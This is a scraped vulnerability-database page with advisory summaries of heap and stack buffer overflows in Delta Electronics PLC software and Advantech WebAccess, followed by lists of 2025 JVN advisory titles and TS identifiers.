var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to 2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation ISPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of dvp files. The process does not properly validate the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. Versions prior to Advantech WebAccess 8.3 are vulnerable
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2025-014642 Multiple vulnerabilities in Canon Printer Drivers for Production Printers, Office/Small Office Multifunction Printers and Laser Printers 2025-09-30T11:50+09:00 2025-09-30T11:50+09:00
jvndb-2025-000081 DataSpider Servista improper restriction of XML external entity references 2025-09-29T14:44+09:00 2025-09-29T14:44+09:00
jvndb-2025-000066 Improper file access permission settings in multiple i-FILTER products 2025-08-27T19:50+09:00 2025-09-29T13:45+09:00
jvndb-2025-000077 RICOH Streamline NX vulnerable to tampering with operation history 2025-09-08T13:42+09:00 2025-09-24T16:53+09:00
jvndb-2025-007519 Multiple vulnerabilities in multiple BROTHER products 2025-06-26T18:15+09:00 2025-09-22T10:16+09:00
jvndb-2025-014105 OMRON SOCIAL SOLUTIONS Uninterruptible Power Supply (UPS) management application registers a Windows service with an unquoted file path 2025-09-19T16:21+09:00 2025-09-19T16:21+09:00
jvndb-2025-014104 Multiple vulnerabilities in I-O DATA wireless LAN routers 2025-09-19T14:58+09:00 2025-09-19T14:58+09:00
jvndb-2025-014081 Multiple Brother and its OEM products with weak initial administrator passwords 2025-09-19T10:52+09:00 2025-09-19T10:52+09:00
jvndb-2025-000079 UNIVERGE IX/IX-R/IX-V series routers provided by NEC Corporation vulnerable to cross-site scripting 2025-09-18T17:43+09:00 2025-09-18T17:43+09:00
jvndb-2025-000078 Century HW RAID Manager registers a Windows service with an unquoted file path 2025-09-17T13:45+09:00 2025-09-17T13:45+09:00
jvndb-2025-000048 WTW-EAGLE App vulnerable to improper server certificate validation 2025-09-12T13:57+09:00 2025-09-12T13:57+09:00
jvndb-2025-000070 "Gunosy" App vulnerable to insertion of sensitive information into sent data 2025-09-02T14:20+09:00 2025-09-09T09:51+09:00
jvndb-2025-000072 Obsidian GitHub Copilot Plugin stores sensitive information in cleartext 2025-09-05T16:52+09:00 2025-09-05T16:52+09:00
jvndb-2025-000073 RATOC RAID Monitoring Manager for Windows registers a Windows service with an unquoted file path 2025-09-05T16:20+09:00 2025-09-05T16:20+09:00
jvndb-2025-000071 "Yahoo! Shopping" App for Android fails to restrict custom URL schemes properly 2025-09-05T15:12+09:00 2025-09-05T15:12+09:00
jvndb-2025-000075 Multiple vulnerabilities in TkEasyGUI 2025-09-05T14:53+09:00 2025-09-05T14:53+09:00
jvndb-2025-000069 Web Caster V130 vulnerable to cross-site request forgery 2025-09-03T14:23+09:00 2025-09-03T14:23+09:00
jvndb-2025-000068 Seiko Solutions SkyBridge BASIC MB-A130 vulnerable to OS command injection 2025-09-01T16:21+09:00 2025-09-01T16:21+09:00
jvndb-2025-012659 Denial-of-service (DoS) vulnerability in Konica Minolta bizhub series 2025-09-01T15:22+09:00 2025-09-01T15:22+09:00
jvndb-2025-000067 Multiple vulnerabilities in multiple iND products 2025-08-29T14:47+09:00 2025-08-29T14:47+09:00
jvndb-2025-000064 Multiple vulnerabilities in SS1 2025-08-27T15:13+09:00 2025-08-27T15:13+09:00
jvndb-2025-000065 ScanSnap Manager installers vulnerable to privilege escalation 2025-08-27T14:22+09:00 2025-08-27T14:22+09:00
jvndb-2025-011884 FUJIFILM Healthcare Americas Synapse Mobility vulnerable to Privilege Escalation 2025-08-21T11:49+09:00 2025-08-25T10:38+09:00
jvndb-2025-000063 Western Digital Kitfox registers a Windows service with an unquoted file path 2025-08-22T13:37+09:00 2025-08-22T13:37+09:00
jvndb-2025-000062 Multiple vulnerabilities in Group-Office 2025-08-21T14:03+09:00 2025-08-21T14:03+09:00
jvndb-2025-000061 Multiple vulnerabilities in Movable Type 2025-08-20T15:30+09:00 2025-08-20T15:30+09:00
jvndb-2025-000059 Seagate Toolkit registers a Windows service with an unquoted file path 2025-08-14T12:32+09:00 2025-08-19T14:40+09:00
jvndb-2025-010854 Trend Micro Endpoint security products for enterprises vulnerable to multiple OS command injection 2025-08-07T12:25+09:00 2025-08-19T11:36+09:00
jvndb-2025-007521 Multiple Brother driver installers for Windows vulnerable to privilege escalation 2025-06-27T09:37+09:00 2025-08-19T11:29+09:00
jvndb-2025-000060 PgManage vulnerable to injection 2025-08-18T13:40+09:00 2025-08-18T13:40+09:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2025-005 TS-2025-005
ts-2025-004 TS-2025-004
ts-2025-003 TS-2025-003
ts-2025-002 TS-2025-002
ts-2025-001 TS-2025-001
ts-2024-013 TS-2024-013
ts-2024-012 TS-2024-012
ts-2024-011 TS-2024-011
ts-2024-010 TS-2024-010
ts-2024-009 TS-2024-009
ts-2024-008 TS-2024-008
ts-2024-007 TS-2024-007
ts-2024-006 TS-2024-006
ts-2024-005 TS-2024-005
ts-2024-004 TS-2024-004
ts-2024-003 TS-2024-003
ts-2024-002 TS-2024-002
ts-2024-001 TS-2024-001
ts-2023-009 TS-2023-009
ts-2023-008 TS-2023-008
ts-2023-007 TS-2023-007
ts-2023-006 TS-2023-006
ts-2023-005 TS-2023-005
ts-2023-004 TS-2023-004
ts-2023-003 TS-2023-003
ts-2023-002 TS-2023-002
ts-2023-001 TS-2023-001
ts-2022-005 TS-2022-005
ts-2022-004 TS-2022-004
ts-2022-003 TS-2022-003